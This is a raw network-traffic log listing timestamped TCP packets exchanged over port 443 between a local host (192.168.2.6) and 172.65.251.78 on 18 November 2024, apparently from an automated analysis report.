                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848036051 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848086119 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848100901 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848150969 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848359108 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848375082 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848414898 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848428011 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848457098 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848474979 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848660946 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848675966 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848721981 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848735094 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.848782063 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849113941 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849128008 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849184990 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849199057 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849247932 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849565983 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849581003 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849630117 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849642992 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849673033 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849690914 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849971056 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.849986076 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850039959 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850054026 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850112915 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850481033 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850496054 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850544930 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850558043 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850600958 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850934982 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.850949049 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851022005 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851036072 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851089001 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851447105 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851468086 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851514101 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851524115 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851567030 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851929903 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851949930 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851984978 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.851993084 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.852015018 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.852036953 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.852389097 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.852402925 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.852438927 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.852447987 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.852487087 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894078016 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894140005 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894351006 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894368887 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894368887 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894406080 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894433975 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894443989 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894443989 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894467115 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894509077 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894710064 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894726992 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894784927 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894802094 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.894849062 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.895250082 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.895278931 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.895353079 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.895354033 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.895376921 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.895433903 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964035034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964057922 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964133024 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964159966 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964242935 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964421034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964437008 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964471102 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964479923 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964502096 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964524984 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964920998 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964936972 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964987040 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.964994907 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.965027094 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.965044975 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.965778112 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.965795040 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.965861082 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.965867996 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.965905905 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966362953 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966382980 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966424942 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966433048 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966459036 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966480970 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966490030 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966505051 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966593027 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966600895 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.966653109 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967051983 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967068911 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967116117 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967124939 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967169046 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967411041 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967427969 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967478991 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967487097 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.967521906 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968120098 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968142033 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968184948 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968193054 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968233109 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968435049 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968449116 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968494892 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968502998 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968539000 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968543053 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968553066 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968576908 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968588114 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968624115 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968630075 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968667984 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968745947 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968760014 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968806982 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968816042 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.968857050 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969053984 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969069004 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969118118 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969126940 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969165087 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969233990 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969249964 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969290018 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969299078 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969340086 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969850063 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969865084 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969908953 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969918013 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:19.969954967 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011323929 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011343956 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011533976 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011575937 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011590004 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011609077 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011665106 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011708975 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011771917 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011796951 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011814117 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011853933 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011868954 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011914015 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.011914015 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.012258053 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.012273073 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.012335062 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.012351990 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.012414932 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.080346107 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.080368996 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.080610037 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.080665112 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.080733061 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.081696987 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.081712961 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.081780910 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.081796885 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.081859112 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082041979 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082058907 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082117081 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082130909 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082180977 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082654953 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082670927 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082740068 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082752943 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.082808971 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083236933 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083260059 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083353043 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083368063 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083419085 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083466053 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083481073 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083539009 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083554029 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.083605051 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084017038 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084032059 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084101915 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084115982 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084162951 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084407091 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084424019 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084490061 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084505081 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084556103 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084903955 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.084920883 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085025072 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085040092 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085098982 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085305929 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085324049 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085392952 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085408926 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085442066 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085460901 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.085988998 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086005926 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086077929 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086091995 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086137056 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086149931 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086158991 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086173058 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086205006 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086251020 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086277962 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086293936 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086344004 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086363077 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086388111 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086419106 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086772919 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086787939 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086842060 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086860895 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086885929 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.086910009 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087038994 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087055922 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087107897 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087121010 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087150097 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087178946 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087282896 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087297916 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087354898 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087368965 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.087425947 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.128151894 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.128185034 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.128340006 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.128376007 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.128427029 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129688978 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129709005 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129775047 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129791021 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129844904 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129858971 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129874945 CET44349752172.65.251.78192.168.2.6
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129929066 CET49752443192.168.2.6172.65.251.78
                                                                                                                                                                                                                      Nov 18, 2024 08:35:20.129935980 CET44349752172.65.251.78192.168.2.6
